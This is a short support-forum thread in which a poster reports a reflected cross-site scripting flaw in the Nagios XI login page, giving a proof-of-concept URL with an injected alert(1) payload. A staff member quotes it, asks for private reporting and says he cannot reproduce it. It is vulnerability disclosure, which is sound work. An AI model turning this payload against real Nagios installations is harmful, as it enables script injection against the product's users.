Nagios XI Cross Site Scripting Vulnerability

This support forum board is for support questions relating to Nagios XI, our flagship commercial network monitoring solution.
Locked
researcher
Posts: 1
Joined: Sun Mar 12, 2017 12:32 am

Nagios XI Cross Site Scripting Vulnerability

Post by researcher »

Moderator Edit: This thread has been split from another - https://support.nagios.com/forum/viewto ... =6&t=34574
In the future, please create a new thread and link to the old one instead of adding on.


# Reflected XSS found on Nagios XI
example:
https://<target ip>/nagiosxi/login.php/hhbdq"-alert(1)-"napn9?redirect=/nagiosxi/index.php%3f&noauth=1
tmcdonald
Posts: 9117
Joined: Mon Sep 23, 2013 8:40 am

Re: Nagios XI Cross Site Scripting Vulnerability

Post by tmcdonald »

researcher wrote:# Reflected XSS found on Nagios XI
example:
https://<target ip>/nagiosxi/login.php/hhbdq"-alert(1)-"napn9?redirect=/nagiosxi/index.php%3f&noauth=1
For future reference, please send these reports to [email protected]

I am not able to reproduce this on the latest XI - What version were you testing against?
Former Nagios employee
Locked